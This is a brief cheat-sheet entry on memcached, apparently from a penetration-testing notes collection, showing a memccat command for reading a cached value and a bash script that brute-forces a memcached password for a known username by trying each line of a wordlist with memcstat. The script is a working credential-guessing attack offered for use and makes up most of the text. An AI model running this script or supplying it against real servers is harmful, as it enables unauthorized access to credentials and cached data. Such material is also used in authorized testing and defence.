Memchache

Get a value from the cache

memccat --servers=<server> --user=<user> --password=<password> <value>

Getting User Access

Script for brute forcing memcached password assuming that you know the user name.

#! /bin/bash
while read F ; do
echo "Trying $F"
    if memcstat --servers=$1 --username=$2 --password=$F | grep -q Server ; then
    echo "Password Found: "$F
    break
fi
done < $3